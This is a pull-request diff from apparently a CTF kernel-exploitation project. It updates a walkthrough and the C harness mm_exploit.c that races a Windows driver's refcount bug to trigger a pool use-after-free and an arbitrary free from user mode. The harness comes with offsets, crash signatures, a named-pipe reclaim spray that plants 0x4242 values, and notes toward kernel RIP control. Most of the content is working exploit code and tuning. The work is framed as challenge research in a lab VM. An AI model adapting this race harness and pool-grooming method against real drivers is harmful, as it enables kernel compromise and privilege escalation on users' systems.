### PR TITLE
MessageManager: fire the UAF trigger debugger-free (drift/driftfire/driftarb)

### DIFF
--- a/docs/messagemanager-walkthrough.md
+++ b/docs/messagemanager-walkthrough.md
@@ -497,6 +497,29 @@ run the race or the debugger-assisted control-flow handoff; those remain disposa
    but keep KD keys and credentials in host credential storage rather than scripts, logs, snapshots,
    or the repository.
 
+### Debugger-free proof loop (what actually worked)
+
+Proving §8's user-mode fire needs no debugger *attached at the moment it fires* — which is the point —
+so the loop is deliberately KD-free and reads the crash afterwards:
+
+1. **Detach (`end_session`), race the guest free over WinRM, let it bugcheck.** With a kernel dump
+   configured, the guest auto-reboots and writes `C:\Windows\Minidump\*.dmp`. Reading that dump is the
+   proof: nothing was attached when the driver freed the UAF'd chunk. Re-attach KD only when you need
+   to *observe* an intermediate state (walk the handle list during a deliberate hold).
+2. **Launch the harness detached from the WinRM job.** A process started with `Start-Process` inside a
+   `PSSession` (or an `Invoke-Command` block) is killed when that session/host job tears down — it
+   dies mid-race, often after writing nothing. Use WMI `Win32_Process.Create`
+   (`cmd /c harness.exe … > out 2> err`); that child survives the session and keeps running.
+3. **Make stdout unbuffered** (`setvbuf(stdout, NULL, _IONBF, 0)`). Redirected stdout is fully
+   buffered, so a bugcheck loses every `printf`; unbuffered, the log on disk shows exactly how far the
+   run got (an 88-byte file of NULs is the tell that the OS never flushed the last line before halt).
+4. **Verify the deployed hash.** `Copy-Item -ToSession` silently produced a corrupted, unrunnable exe
+   once ("file corrupted/unreadable"); compare `Get-FileHash` against the host build after every copy.
+5. **Classify the crash from the minidump, not a live break-in.** The bugcheck code plus the top
+   `MessageManager+RVA` frame is enough to tell an intended fire (`SetData`'s `ExFreePoolWithTag`,
+   `+0x1654`) from an incidental one (Flush's unlink AV, `+0x14e9`; a `Tfub` LFH double-free at
+   `+0x1668`).
+
 ## Gotchas recap
 
 - **Attach blocks on an INFINITE wait** — diagnose a hung attach out-of-band, don't hammer tools.
@@ -520,6 +543,12 @@ run the race or the debugger-assisted control-flow handoff; those remain disposa
 - **`!analyze` can misname the faulting module** — trust the bugcheck banner and `IP_IN_PAGED_CODE`.
 - **Verifier special pool hides a driver from naive walkers** — it needs a page-granular decoder;
   `pool_find_tag` handles it, and shows the guard page as an `Unreadable` neighbour.
+- **The refcount race is won by volume, not a wider window** — SetData rejects `Length > 0x2FF4`, so
+  enlarging its `memcpy` to widen the mutex hold silently no-ops the call. The missing-inc window is a
+  few instructions; millions of cross-move attempts win it, one-per-message does not (§8).
+- **A single unmapped `poi` aborts a whole `execute` script with `0x80040205`** — walking a list where
+  some nodes point at freed/unmapped chunks fails opaquely with no partial result. Read defensively
+  (bisect the range, or print pointers without dereferencing first) rather than trusting one big walk.
 - **A full pool walk is expensive on a *live* KDNET target** — `pool_find_tag`/`pool_census`
   traverse every free tree node-by-node over the wire, and a live target mutates the lists under
   the walk (stale pointers get chased, diagnostics balloon), so the call can exceed the engine

--- a/docs/messagemanager-walkthrough.md
+++ b/docs/messagemanager-walkthrough.md
@@ -361,14 +361,15 @@ Flush + the missing-inc, and the missing-inc is produced by the **lockless unlin
 list** — so Flush AVs walking the corrupted list, or a re-touch double-frees, and the heap is
 corrupted *faster* than any controlled reclaim-then-Delete can run. Across ~10 crash/reboot cycles
 the same race fired from four distinct debugger-free sites — SetData's free (`+0x1654`), SetData's
-`ExAllocatePool2` for a new `Tfub` on a corrupted `Tfub` LFH (`+0x1668`), and Flush's unlink write
-`[Blink]=Flink` (`+0x14e9`, a `0x3B` AV — the **write-what-where** primitive firing on garbage) —
-but never the clean `0x4242` ordering. That ordering is exactly what KD buys in §9: precise control
-over *when* the free happens relative to the reclaim. Harness modes `drift` (winnability proof),
-`driftfire` (safe single-pass toward a controlled Delete), and `driftarb` (continuous race + planted
-`0x4242` reclaim) are all in `mm_exploit.c`.
+`ExAllocatePool2` for a new `Tfub` on a corrupted `Tfub` LFH (`+0x1668`), Flush's unlink write
+`[Blink]=Flink` (`+0x14e9`, a `0x3B` AV — the **write-what-where** primitive firing on garbage), and
+Flush's list-walk read `mov rax,[rcx+8]` (`+0x14de`, the `0x50`/`AV_VRF` §3 first met under Driver
+Verifier's special pool) — but never the clean `0x4242` ordering. That ordering is exactly what KD
+buys in §9: precise control over *when* the free happens relative to the reclaim. Harness modes
+`drift` (winnability proof), `driftfire` (safe single-pass toward a controlled Delete), and
+`driftarb` (continuous race + planted `0x4242` reclaim) are all in `mm_exploit.c`.
 
-A further presentation turned up during the 28-run batch, and it is the one worth knowing before you
+A fifth presentation turned up during the 28-run batch, and it is the one worth knowing before you
 triage a dump from this race:
 
 ```text

--- a/docs/messagemanager-walkthrough.md
+++ b/docs/messagemanager-walkthrough.md
@@ -321,8 +321,9 @@ and Flush to the instruction shows the real bug and the real lever:
   exact free-with-node the arbitrary-free needs.
 - The window is a handful of instructions, so the win is **statistical**. Widening SetData's `memcpy`
   is a dead end — the driver rejects `Length > 0x2FF4`, so a large buffer silently no-ops the call.
-  The lever is **volume**: every earlier harness raced one cross-move per message (tens to low
-  hundreds of attempts); the win needs millions.
+  The lever is **sustained hammering**: every earlier harness performed one cross-move per message
+  and then moved on, so the race got tens to low hundreds of isolated attempts. What it needs is a
+  loop that keeps cross-moving the *same* messages against a Flush that keeps walking the list.
 
 The `drift` mode (`examples/messagemanager/mm_exploit.c`) seeds a small set of messages and loops
 `SetData(→large)/SetData(→small)` cross-moves on them while `Flush(small)` and `Flush(large)`
@@ -341,6 +342,17 @@ from user mode — three independent minidumps, same signature. The guest auto-r
 dump, so reading it *is* the debugger-free proof: nothing was attached when it fired. So the last KD
 dependency §7 carried — *the trigger* — is gone.
 
+**How often does it win? Measured rather than estimated: 28 consecutive runs, 28 bugchecks.** Two
+configurations, both saturated — the default (64 messages, 20-second window) at 16/16, and the
+smallest the harness accepts, `drift 1 1 1`, a **single** message raced for **one second**, at 12/12.
+Time from process launch to bugcheck was 0.61–0.63 s in nearly every run and *identical* for one
+message and sixty-four, which means it is measuring process startup, not the race; once the threads
+are running the win lands within milliseconds. Two things follow. First, "volume" is about sustained
+attempts, not a large target set: one message hammered for one second is enough. Second, a saturated
+rate can show that a change did not regress the race, but it can never show that two variants differ
+— for that the window would have to drop below a second or the loop be throttled, and the harness
+exposes neither.
+
 **What is still debugger-assisted is only the *cleanliness* of the fire, and that turns out to be a
 genuine constraint, not a budget shortfall.** A weaponized arbitrary free wants the freed pointer to
 be an attacker-*chosen* value (plant `0x4242…` into the freed slot via the §6 `IoSB` reclaim, then
@@ -355,6 +367,22 @@ but never the clean `0x4242` ordering. That ordering is exactly what KD buys in 
 over *when* the free happens relative to the reclaim. Harness modes `drift` (winnability proof),
 `driftfire` (safe single-pass toward a controlled Delete), and `driftarb` (continuous race + planted
 `0x4242` reclaim) are all in `mm_exploit.c`.
+
+A further presentation turned up during the 28-run batch, and it is the one worth knowing before you
+triage a dump from this race:
+
+```text
+KERNEL_MODE_HEAP_CORRUPTION (13a)   Arg1 = 0x11        ; not the usual 0x8
+nt!RtlpHpLfhSubsegmentDelayFreeListProcess
+nt!RtlpHpLfhOwnerCompact → nt!ExpHpCompactionRoutine → nt!ExpWorkerThread
+PROCESS_NAME: System                ; mm_exploit.exe had already exited
+```
+
+This is LFH *maintenance* tripping over the corrupt subsegment asynchronously, on a system worker
+thread, after the harness process is gone — same root cause, later detection point. The trap is that
+**`MessageManager` appears nowhere in the stack**, so the obvious reading is "unrelated crash, some
+other bug". It is not: a corrupted subsegment outlives the process that corrupted it, and the heap
+gets to it on its own schedule.
 
 The boundary has moved twice now: from "reclaim needs KD" (§6 removed it) to "the trigger needs KD"
 to **"the trigger and both primitives fire debugger-free; only the clean *chosen-target ordering*
@@ -518,7 +546,20 @@ so the loop is deliberately KD-free and reads the crash afterwards:
 5. **Classify the crash from the minidump, not a live break-in.** The bugcheck code plus the top
    `MessageManager+RVA` frame is enough to tell an intended fire (`SetData`'s `ExFreePoolWithTag`,
    `+0x1654`) from an incidental one (Flush's unlink AV, `+0x14e9`; a `Tfub` LFH double-free at
-   `+0x1668`).
+   `+0x1668`). **An absent driver frame does not mean an unrelated crash:** the `0x13A`/`Arg1=0x11`
+   variant is raised from `RtlpHpLfhSubsegmentDelayFreeListProcess` on a *system worker thread* with
+   `PROCESS_NAME: System`, because LFH compaction reached the corrupt subsegment after the harness
+   exited. Check the bugcheck arguments and the `RtlpHp*` frame before discarding a dump.
+6. **Take the crash instant from the dump, not from host-side polling.** The dump's own `.time`
+   ("Debug session time") is the moment of the bugcheck, rendered in the *debugger host's* timezone;
+   subtract the launch timestamp for a real time-to-crash. Polling a TCP port to notice the guest
+   going down is unreliable — a fast crash-and-reboot cycle can fit entirely between two probes and
+   read as a successful run. Diff `C:\Windows\Minidump` and compare `LastBootUpTime` instead; the
+   dump directory rotates (five files here), so copy each dump off before the next run, and match by
+   crash timestamp rather than filename, since names are reused.
+7. **Anything written to the guest seconds before the bugcheck is lost.** NTFS never flushes it, so a
+   helper script created just before the run is gone after the reboot and the *next* run silently
+   does nothing. Write helpers first, `Write-VolumeCache -DriveLetter C`, then verify they exist.
 
 ## Gotchas recap
 

--- a/docs/messagemanager-walkthrough.md
+++ b/docs/messagemanager-walkthrough.md
@@ -1,17 +1,18 @@
-# MessageManager: from a pool UAF to KD-assisted RIP control
+# MessageManager: from a pool UAF to a debugger-free arbitrary-free
 
 A tour of the **MessageManager** CTF driver on a **live KDNET kernel** (Windows Server 26100),
 driven end to end with windbg-mcp. Unlike the [HEVD](hevd-ioctl-walkthrough.md) and
 [mountmgr](driver-ioctl-walkthrough.md) tours — which are about *reaching* an IOCTL — this one is
-about a **use-after-free in the kernel pool**, measuring candidate reclaims, and proving controlled
-kernel RIP with a debugger-assisted handoff when natural grooming misses. There is **no PDB**, so
-everything is `module+RVA`.
+about a **use-after-free in the kernel pool**: measuring candidate reclaims, proving controlled
+kernel RIP with a debugger-assisted handoff, and then removing the debugger from the pieces that let
+it — first the reclaim, then the trigger itself. There is **no PDB**, so everything is `module+RVA`.
 
-> **The thesis.** The bug is a garden-variety locking mistake. The interesting parts are proving
-> what the allocator actually did on Windows 26100, extending the tiny refcount race without losing
-> the target object, and separating a natural reclaim from a debugger-assisted control-flow proof.
-> A pool walker that silently returns "empty" is worse than no walker at all, so this also records
-> the four fixes needed before the 26100 measurements could be trusted.
+> **The thesis.** The bug is a garden-variety locking mistake. The interesting parts are proving what
+> the allocator actually did on Windows 26100, understanding the tiny refcount race exactly enough to
+> win it from pure user mode (the free-with-node fires debugger-free and Verifier-free — §8), and
+> separating what genuinely needs a kernel debugger from what only looked like it did. A pool walker
+> that silently returns "empty" is worse than no walker at all, so this also records the four fixes
+> needed before the 26100 measurements could be trusted.
 
 The four kernel-pool tools this walkthrough leans on (`pool_find_tag`, `pool_chunk`, `pool_census`,
 `pool_diagnostics`) were built for exactly this target; see the
@@ -253,7 +254,7 @@ chain no longer needs the debugger. The caveat is offset control. `FSCTL_PIPE_WA
 `FILE_PIPE_WAIT_FOR_BUFFER`: `+0x00` Timeout (free — the `RefCount`), `+0x08` `NameLength` (a
 validated length, not a pointer), `+0x10..` the pipe name. So it controls `+0x00` and `+0x10`
 onward — reaching **Buffer `+0x18`, the arbitrary-free primitive** — but **not** Flink `+0x08` as a
-kernel pointer, which the §8 *unlink* RIP specifically writes. Removing the assist from the unlink
+kernel pointer, which the §9 *unlink* RIP specifically writes. Removing the assist from the unlink
 variant still needs an offset-`0` primitive that also frees `+0x08`; the data-only **arbitrary-free**
 route (`ExFreePoolWithTag(msg+0x18)`, §3/§6) is now reachable with a fully natural reclaim, and a
 double-free → type-confusion would sidestep `+0x08` entirely.
@@ -299,7 +300,67 @@ does not mark the target allocated in LFH metadata, so the VM must be rebooted a
 Keeping this boundary explicit is important: the handoff proves the object layout, stale lookup,
 unlink primitive, and final indirect call; it does not claim a production-quality pool spray.
 
-## 8. Direct RIP control without `PreviousMode`
+## 8. Firing the same UAF without a debugger
+
+§7's handoff proves the object layout and the primitives, but it drives the free with KD: it stops
+the SetData caller at the unlink, walks the refcount to 1 by hand, and steps Flush into the free.
+That leaves one honest gap — *does the race actually win from user mode?* On this build it does, and
+reliably.
+
+The blocker was never the reclaim (§6 made that natural) and never the arithmetic. Reversing SetData
+and Flush to the instruction shows the real bug and the real lever:
+
+- **Flush holds the list lock across its whole walk** (`+0x14cd` acquire → `+0x1531` release), so no
+  amount of Flush-vs-Flush hammering yields a double free. The only cross-decrement is Flush vs
+  SetData's cross-move.
+- SetData's cross-move does its **unlink from the source list holding only the per-message mutex, not
+  the list lock** (`+0x16e4`), and it decides inc-vs-no-inc from a **TOCTOU read of the `Linked`
+  flag** (`+0x16d5`). When a concurrent Flush clears `Linked` and decrements in that window, SetData
+  relinks to the target list **without** the compensating inc — the message ends on a list at
+  refcount one-too-low, and the next Flush frees it **with its handle node still alive**. That is the
+  exact free-with-node the arbitrary-free needs.
+- The window is a handful of instructions, so the win is **statistical**. Widening SetData's `memcpy`
+  is a dead end — the driver rejects `Length > 0x2FF4`, so a large buffer silently no-ops the call.
+  The lever is **volume**: every earlier harness raced one cross-move per message (tens to low
+  hundreds of attempts); the win needs millions.
+
+The `drift` mode (`examples/messagemanager/mm_exploit.c`) seeds a small set of messages and loops
+`SetData(→large)/SetData(→small)` cross-moves on them while `Flush(small)` and `Flush(large)`
+hammer both lists — a pure user-mode race, all four CPUs. **Live on 26100.32995 with Driver Verifier
+off and no debugger attached, it bugchecks the guest within about a second:**
+
+```text
+KERNEL_MODE_HEAP_CORRUPTION (13a)
+nt!RtlpHpVsContextFree → nt!ExFreePoolWithTag
+MessageManager+0x1654        ; SetData's ExFreePoolWithTag(msg+0x18,'Tfub')
+PROCESS_NAME: mm_exploit.exe
+```
+
+That is the driver's own arbitrary-free path executing on a use-after-free MESSAGE, driven entirely
+from user mode — three independent minidumps, same signature. The guest auto-reboots and writes the
+dump, so reading it *is* the debugger-free proof: nothing was attached when it fired. So the last KD
+dependency §7 carried — *the trigger* — is gone.
+
+**What is still debugger-assisted is only the *cleanliness* of the fire, and that turns out to be a
+genuine constraint, not a budget shortfall.** A weaponized arbitrary free wants the freed pointer to
+be an attacker-*chosen* value (plant `0x4242…` into the freed slot via the §6 `IoSB` reclaim, then
+Delete the stale node → `ExFreePoolWithTag(0x4242…)`). But the only source of the stale handle is
+Flush + the missing-inc, and the missing-inc is produced by the **lockless unlink that tears the
+list** — so Flush AVs walking the corrupted list, or a re-touch double-frees, and the heap is
+corrupted *faster* than any controlled reclaim-then-Delete can run. Across ~10 crash/reboot cycles
+the same race fired from four distinct debugger-free sites — SetData's free (`+0x1654`), SetData's
+`ExAllocatePool2` for a new `Tfub` on a corrupted `Tfub` LFH (`+0x1668`), and Flush's unlink write
+`[Blink]=Flink` (`+0x14e9`, a `0x3B` AV — the **write-what-where** primitive firing on garbage) —
+but never the clean `0x4242` ordering. That ordering is exactly what KD buys in §9: precise control
+over *when* the free happens relative to the reclaim. Harness modes `drift` (winnability proof),
+`driftfire` (safe single-pass toward a controlled Delete), and `driftarb` (continuous race + planted
+`0x4242` reclaim) are all in `mm_exploit.c`.
+
+The boundary has moved twice now: from "reclaim needs KD" (§6 removed it) to "the trigger needs KD"
+to **"the trigger and both primitives fire debugger-free; only the clean *chosen-target ordering*
+remains KD-assisted."**
+
+## 9. Direct RIP control without `PreviousMode`
 
 The first post-UAF attempt used the usual data-only bootstrap: set fake `Flink` to a writable kernel
 anchor ending in `0x0800`, set fake `Blink` to `KTHREAD.PreviousMode`, and let the unlink's second
@@ -359,18 +420,18 @@ redirected the trigger to the original CREATE handler, and finally restored the 
 clean reboot discarded the intentionally corrupted free chunk.
 
 This establishes controlled kernel RIP on the challenge build. The RIP *mechanism* above is
-debugger-assisted, but the **reclaim it depended on is no longer**: §6 shows a pending
-`FSCTL_PIPE_WAIT` (`IoSB`) spray reclaiming freed `Tgsm` slots naturally (8/16), attacker-controlled
-from `+0x00`, with no debugger. So the KD-forced allocation return can be dropped from the reclaim
-step. What the *unlink* variant in this section still needs is `+0x08` as a kernel pointer, which the
-`IoSB` buffer pins to `NameLength`; that specific store is the only remaining debugger-assisted
-piece. The natural reclaim instead lands the controllable fields at `+0x00` and `+0x18`, which is
-exactly the **arbitrary-free** primitive (§3, §6) — a debugger-free `ExFreePoolWithTag(msg+0x18)`
-that a full exploit would pivot through (free-a-victim → type-confusion), rather than the KD-only
-dispatch overwrite shown here. This makes no claim of privilege escalation; it moves the boundary
-from "reclaim needs KD" to "only the `+0x08` unlink store needs KD."
+debugger-assisted, but the pieces it depended on have fallen away one at a time: §6 makes the
+**reclaim** natural (a pending `FSCTL_PIPE_WAIT`/`IoSB` spray reclaims freed `Tgsm` slots 8/16,
+attacker-controlled from `+0x00`, no debugger), and §8 makes the **trigger** natural (the high-volume
+`drift` race fires `ExFreePoolWithTag` on a use-after-free MESSAGE from user mode, three dumps, no
+debugger and no Verifier). What the *unlink* variant in this section still specifically needs is
+`+0x08` as a kernel pointer, which the `IoSB` buffer pins to `NameLength`; that store, and the
+precise free-vs-reclaim *ordering* a clean chosen-target arbitrary free needs (§8), are what KD still
+buys. This makes no claim of privilege escalation; it moves the boundary from "reclaim needs KD"
+through "trigger needs KD" to **"the primitives fire debugger-free; only the `+0x08` unlink store and
+the clean chosen-target ordering remain KD-assisted."**
 
-## 9. Streamlining the next kernel CTF
+## 10. Streamlining the next kernel CTF
 
 This run exposed several improvements that would remove orchestration risk without hiding the
 debugger mechanics.

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -858,6 +858,23 @@ static int pin_thread(HANDLE thread, DWORD_PTR affinity_mask, const char *role) 
     return 0;
 }
 
+/*
+ * Join workers that have already been told to stop. A bounded wait alone is not enough: every
+ * caller frees the id and context arrays the workers are still reading, so returning early on
+ * WAIT_TIMEOUT is a user-mode use-after-free -- and a worker that keeps calling SetData/Flush past
+ * the join also destroys the kernel-side crash signature this harness exists to produce. So report
+ * the overrun and then wait unbounded; a stuck DeviceIoControl means the guest is already dying.
+ */
+static void join_workers(const char *tag, HANDLE *threads, int count, DWORD timeout_ms) {
+    if (count <= 0) return;
+    DWORD w = WaitForMultipleObjects((DWORD)count, threads, TRUE, timeout_ms);
+    if (w == WAIT_OBJECT_0) return;
+    printf("[%s] worker wait=0x%08lx; waiting for shutdown before cleanup\n", tag, w);
+    fflush(stdout);
+    if (w == WAIT_FAILED) return;    /* bad handle: an unbounded retry would fail identically */
+    WaitForMultipleObjects((DWORD)count, threads, TRUE, INFINITE);
+}
+
 static DWORD WINAPI race_thread(void *opaque) {
     RACE_CONTEXT *ctx = opaque;
     SetThreadPriority(GetCurrentThread(), ctx->ThreadPriority);
@@ -1923,7 +1940,10 @@ static DWORD WINAPI drift_thread(void *opaque) {
     int passes = 0;
     while (!InterlockedCompareExchange(c->Stop, 0, 0)) {
         if (c->Role == 0) {
-            for (int i = 0; i < c->Count; i++) {
+            /* Stop is re-read per id, not just per pass: a pass is `Count` driver round-trips, and
+             * the caller must be able to guarantee no SetData lands after the join (see
+             * join_workers). One interlocked read per two DeviceIoControls is noise. */
+            for (int i = 0; i < c->Count && !InterlockedCompareExchange(c->Stop, 0, 0); i++) {
                 mm_setdata(dev, c->Ids[i], large, sizeof(large));   /* small -> large cross-move */
                 mm_setdata(dev, c->Ids[i], small, sizeof(small));   /* large -> small cross-move */
                 ops += 2;
@@ -1933,7 +1953,7 @@ static DWORD WINAPI drift_thread(void *opaque) {
              * freed message is never re-touched (no uncontrolled SetData-on-freed crash). The
              * small->large cross-move races Flush(small) for the missing-inc, priming M onto the
              * large list; with no Flush(large) running, a primed M is never freed here. */
-            for (int i = 0; i < c->Count; i++) {
+            for (int i = 0; i < c->Count && !InterlockedCompareExchange(c->Stop, 0, 0); i++) {
                 mm_setdata(dev, c->Ids[i], large, sizeof(large));
                 ops++;
             }
@@ -2005,6 +2025,9 @@ static int do_drift(int argc, char **argv) {
 
     const DWORD_PTR masks[] = { MM_CPU_SETTER_MASK, MM_CPU_TRIGGER_MASK };  /* setters: CPU1, CPU3 */
     int started = 0;
+    int pinned = 1;      /* tracked apart from `started`: a failed pin on the LAST worker still
+                          * leaves started == nthreads, and an unpinned flusher runs on whatever
+                          * CPU it likes -- the topology this race depends on is gone. */
     for (int i = 0; i < nthreads; i++) {
         ctx[i].Stop = &stop;
         ctx[i].Ids = ids;
@@ -2018,13 +2041,14 @@ static int do_drift(int argc, char **argv) {
         threads[i] = CreateThread(NULL, 0, drift_thread, &ctx[i], 0, NULL);
         if (!threads[i]) break;
         started++;
-        if (!pin_thread(threads[i], mask, "drift worker")) break;
+        if (!pin_thread(threads[i], mask, "drift worker")) { pinned = 0; break; }
     }
-    if (started != nthreads) {
-        printf("[drift] prepared only %d/%d threads\n", started, nthreads);
+    if (started != nthreads || !pinned) {
+        printf("[drift] prepared only %d/%d pinned threads\n", pinned ? started : started - 1, nthreads);
         InterlockedExchange(&stop, 1);
         SetEvent(start);
-        for (int i = 0; i < started; i++) { WaitForSingleObject(threads[i], 15000); CloseHandle(threads[i]); }
+        join_workers("drift", threads, started, 15000);
+        for (int i = 0; i < started; i++) CloseHandle(threads[i]);
         CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
         return 1;
     }
@@ -2034,7 +2058,7 @@ static int do_drift(int argc, char **argv) {
     SetEvent(start);
     Sleep((DWORD)seconds * 1000);
     InterlockedExchange(&stop, 1);
-    WaitForMultipleObjects(nthreads, threads, TRUE, 30000);
+    join_workers("drift", threads, nthreads, 30000);
     LONG64 total = 0;
     for (int i = 0; i < nthreads; i++) { total += ctx[i].Ops; CloseHandle(threads[i]); }
     printf("[drift] survived %d s, %lld driver calls -- no win this run; re-run or raise volume\n",
@@ -2102,6 +2126,7 @@ static int do_driftfire(int argc, char **argv) {
     if (!start) { free(ctx); free(threads); free(ids); CloseHandle(dev); return 2; }
     const DWORD_PTR masks[] = { MM_CPU_SETTER_MASK, MM_CPU_TRIGGER_MASK };
     int started = 0;
+    int pinned = 1;
     for (int i = 0; i < nthreads; i++) {
         ctx[i].Stop = &stop; ctx[i].Ids = ids; ctx[i].Count = made; ctx[i].StartEvent = start;
         DWORD_PTR mask;
@@ -2110,20 +2135,31 @@ static int do_driftfire(int argc, char **argv) {
         threads[i] = CreateThread(NULL, 0, drift_thread, &ctx[i], 0, NULL);
         if (!threads[i]) break;
         started++;
-        if (!pin_thread(threads[i], mask, "driftfire worker")) break;
+        if (!pin_thread(threads[i], mask, "driftfire worker")) { pinned = 0; break; }
     }
-    if (started != nthreads) {
-        printf("[driftfire] prepared only %d/%d threads\n", started, nthreads);
+    if (started != nthreads || !pinned) {
+        printf("[driftfire] prepared only %d/%d pinned threads\n", pinned ? started : started - 1, nthreads);
         InterlockedExchange(&stop, 1); SetEvent(start);
-        for (int i = 0; i < started; i++) { WaitForSingleObject(threads[i], 15000); CloseHandle(threads[i]); }
+        join_workers("driftfire", threads, started, 15000);
+        for (int i = 0; i < started; i++) CloseHandle(threads[i]);
         CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
         return 1;
     }
     SetEvent(start);
-    /* Wait for the bounded setters to finish their passes, then stop and join the flusher. */
-    WaitForMultipleObjects(setters, threads, TRUE, 60000);
+    /* Wait for the bounded setters to finish their passes, then stop and join the flusher.
+     * The fire phase below Deletes the very ids the setters cross-move, so a setter that outlives
+     * this wait would both re-touch a freed id (the uncontrolled 0x13A this mode exists to avoid)
+     * and read `ids`/`ctx` after they are freed. An overrun therefore stops and joins, it does not
+     * proceed. */
+    DWORD setter_wait = WaitForMultipleObjects((DWORD)setters, threads, TRUE, 60000);
     InterlockedExchange(&stop, 1);
-    WaitForSingleObject(threads[setters], 30000);
+    if (setter_wait != WAIT_OBJECT_0) {
+        printf("[driftfire] setter wait=0x%08lx after %d pass(es); joining before the fire phase\n",
+               setter_wait, passes);
+        fflush(stdout);
+        join_workers("driftfire", threads, setters, INFINITE);
+    }
+    join_workers("driftfire", &threads[setters], 1, 30000);
     for (int i = 0; i < nthreads; i++) CloseHandle(threads[i]);
     printf("[driftfire] race done; setters stopped -- controlled fire phase\n");
     fflush(stdout);
@@ -2221,6 +2257,7 @@ static int do_driftarb(int argc, char **argv) {
     if (!start) { free(ctx); free(threads); free(pool); free(ids); CloseHandle(dev); return 2; }
     const DWORD_PTR smasks[] = { MM_CPU_SETTER_MASK, MM_CPU_TRIGGER_MASK };  /* setters: CPU1, CPU3 */
     int started = 0;
+    int pinned = 1;
     for (int i = 0; i < nthreads; i++) {
         ctx[i].Stop = &stop; ctx[i].Ids = ids; ctx[i].Count = made; ctx[i].StartEvent = start;
         ctx[i].Pool = pool; ctx[i].PoolNext = &poolnext; ctx[i].PoolCap = cap;
@@ -2232,19 +2269,23 @@ static int do_driftarb(int argc, char **argv) {
         threads[i] = CreateThread(NULL, 0, drift_thread, &ctx[i], 0, NULL);
         if (!threads[i]) break;
         started++;
-        if (!pin_thread(threads[i], mask, "driftarb worker")) break;
+        if (!pin_thread(threads[i], mask, "driftarb worker")) { pinned = 0; break; }
     }
-    if (started != nthreads) {
-        printf("[driftarb] prepared only %d/%d threads\n", started, nthreads);
+    if (started != nthreads || !pinned) {
+        printf("[driftarb] prepared only %d/%d pinned threads\n", pinned ? started : started - 1, nthreads);
         InterlockedExchange(&stop, 1); SetEvent(start);
-        for (int i = 0; i < started; i++) { WaitForSingleObject(threads[i], 15000); CloseHandle(threads[i]); }
+        join_workers("driftarb", threads, started, 15000);
+        for (int i = 0; i < started; i++) CloseHandle(threads[i]);
         CloseHandle(start); free(ctx); free(threads); free(pool); free(ids); CloseHandle(dev);
         return 1;
     }
     SetEvent(start);
     Sleep((DWORD)burst_ms);
     InterlockedExchange(&stop, 1);
-    WaitForMultipleObjects(nthreads, threads, TRUE, 60000);
+    /* Every worker must be joined before the Delete-trigger below: a setter still cross-moving
+     * would re-touch a freed id (an uncontrolled crash instead of the 0x4242 fire), and the pool
+     * and id arrays are freed at the end of this function. */
+    join_workers("driftarb", threads, nthreads, 60000);
     for (int i = 0; i < nthreads; i++) CloseHandle(threads[i]);
 
     /* The burst primed/freed some messages; the reclaimers planted 0x4242 fake MESSAGEs into freed

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -875,6 +875,33 @@ static void join_workers(const char *tag, HANDLE *threads, int count, DWORD time
     WaitForMultipleObjects((DWORD)count, threads, TRUE, INFINITE);
 }
 
+/*
+ * Hold the start gate until every worker has reported that it opened \\.\MessageDevice. Creating
+ * and pinning a thread says nothing about whether it can talk to the driver, and a worker that
+ * fails there exits before the gate -- so the race would silently run with fewer participants than
+ * the topology assumes. Returns 0 if any worker failed or the roll call did not complete in time;
+ * the caller then stops and joins rather than racing a crippled set.
+ */
+static int await_workers_ready(const char *tag, volatile LONG *ready, volatile LONG *failed,
+                               int count, DWORD timeout_ms) {
+    ULONGLONG deadline = GetTickCount64() + timeout_ms;
+    for (;;) {
+        LONG ok = InterlockedCompareExchange(ready, 0, 0);
+        LONG bad = InterlockedCompareExchange(failed, 0, 0);
+        if (bad > 0) {
+            printf("[%s] %ld/%d worker(s) could not open \\\\.\\MessageDevice: %lu\n",
+                   tag, bad, count, GetLastError());
+            return 0;
+        }
+        if (ok >= count) return 1;
+        if (GetTickCount64() >= deadline) {
+            printf("[%s] only %ld/%d workers reached the start gate\n", tag, ok, count);
+            return 0;
+        }
+        Sleep(1);
+    }
+}
+
 static DWORD WINAPI race_thread(void *opaque) {
     RACE_CONTEXT *ctx = opaque;
     SetThreadPriority(GetCurrentThread(), ctx->ThreadPriority);
@@ -1921,20 +1948,35 @@ typedef struct _DRIFT_CTX {
     int MaxPasses;          /* setter roles: stop after this many passes (0 = until Stop) */
     HANDLE StartEvent;
     volatile LONG64 Ops;
-    /* role 5 shares one growing pool across reclaimers via an atomic cursor. */
+    /* Readiness handshake, shared by every worker of a run: a worker that cannot open the device
+     * exits before the gate, and a coordinator checking only CreateThread/pinning would never
+     * notice -- see await_workers_ready. */
+    volatile LONG *Ready;
+    volatile LONG *Failed;
+    /* role 5 shares one growing pool across reclaimers via an atomic cursor. PoolNext is the slot
+     * cursor (advanced even by a failed spray, so slots are never reused); PoolOk counts the sprays
+     * that actually parked a buffer, which is the only number that means "planted". */
     PENDING_PIPEWAIT *Pool;
     volatile LONG *PoolNext;
+    volatile LONG *PoolOk;
     int PoolCap;
 } DRIFT_CTX;
 
 static DWORD WINAPI drift_thread(void *opaque) {
     DRIFT_CTX *c = opaque;
     HANDLE dev = open_device();
-    if (!dev) return 1;
+    if (!dev) {
+        /* Report the failure instead of vanishing: a silently missing setter turns `drift` into a
+         * false negative, and would let `driftfire` mistake this already-exited thread for a
+         * finished race and walk into its Delete phase having raced nothing. */
+        InterlockedIncrement(c->Failed);
+        return 1;
+    }
     SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
     UCHAR large[0x400], small[0x40];    /* both within [0x20,0x2FF4]; 0x400>=0x200 -> large list */
     memset(large, 0x4c, sizeof(large));
     memset(small, 0x41, sizeof(small));
+    InterlockedIncrement(c->Ready);
     WaitForSingleObject(c->StartEvent, INFINITE);
     LONG64 ops = 0;
     int passes = 0;
@@ -1971,7 +2013,9 @@ static DWORD WINAPI drift_thread(void *opaque) {
                     * fires: the clean, attacker-chosen arbitrary free. */
             LONG idx = InterlockedIncrement(c->PoolNext) - 1;
             if (idx >= c->PoolCap) { for (LONG i = 0; i < 200000 && !InterlockedCompareExchange(c->Stop,0,0); i++) YieldProcessor(); continue; }
-            spray_pending_pipewait(idx, &c->Pool[idx], 0, 1);
